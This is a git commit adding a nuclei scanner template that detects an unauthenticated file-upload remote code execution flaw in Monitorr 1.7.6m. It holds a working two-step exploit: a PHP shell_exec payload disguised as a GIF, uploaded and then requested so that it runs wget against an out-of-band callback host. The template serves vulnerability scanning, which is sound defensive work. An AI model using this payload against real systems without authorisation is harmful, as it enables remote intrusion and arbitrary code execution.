Create monitorr-rce.yaml

This template detects an Monitorr 1.7.6m a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in web application. An unauthorized attacker with web access to could upload and execute a specially crafted file leading to remote code execution within the Monitorr. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
2021-07-20 08:20:18 +09:00 · 2021-07-20 08:20:18 +09:00 · b32ccad2c8
parent c999ea6f62
commit b32ccad2c8
1 changed files with 51 additions and 0 deletions
--- a/vulnerabilities/other/monitorr-rce.yaml
+++ b/vulnerabilities/other/monitorr-rce.yaml
@ -0,0 +1,51 @@
+id: monitorr-rce
+
+info:
+  name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution
+  author: gy741
+  severity: critical
+  description: This template detects an Monitorr 1.7.6m a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in web application. An unauthorized attacker with web access to could upload and execute a specially crafted file leading to remote code execution within the Monitorr.
+  reference: |
+    - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
+    - https://www.exploit-db.com/exploits/48980
+  tags: monitorr,rce,oob
+
+requests:
+  - raw:
+      - |
+        POST /assets/php/upload.php HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
+        Accept-Encoding: gzip, deflate
+        Accept: text/plain, */*; q=0.01
+        Connection: close
+        Accept-Language: en-US,en;q=0.5
+        X-Requested-With: XMLHttpRequest
+        Content-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745
+        Origin: http://{{Hostname}}
+        Referer: http://{{Hostname}}
+        Content-Length: 319
+
+        -----------------------------31046105003900160576454225745
+        Content-Disposition: form-data; name="fileToUpload"; filename="nuclei_poc.php"
+        Content-Type: image/gif
+
+        GIF89a213213123<?php shell_exec("wget -c http://{{interactsh-url}}");
+
+        -----------------------------31046105003900160576454225745--
+
+      - |
+        GET /assets/data/usrimg/nuclei_poc.php HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
+        Accept-Encoding: gzip, deflate
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+        Connection: close
+        Accept-Language: en-US,en;q=0.5
+        Upgrade-Insecure-Requests: 1
+
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"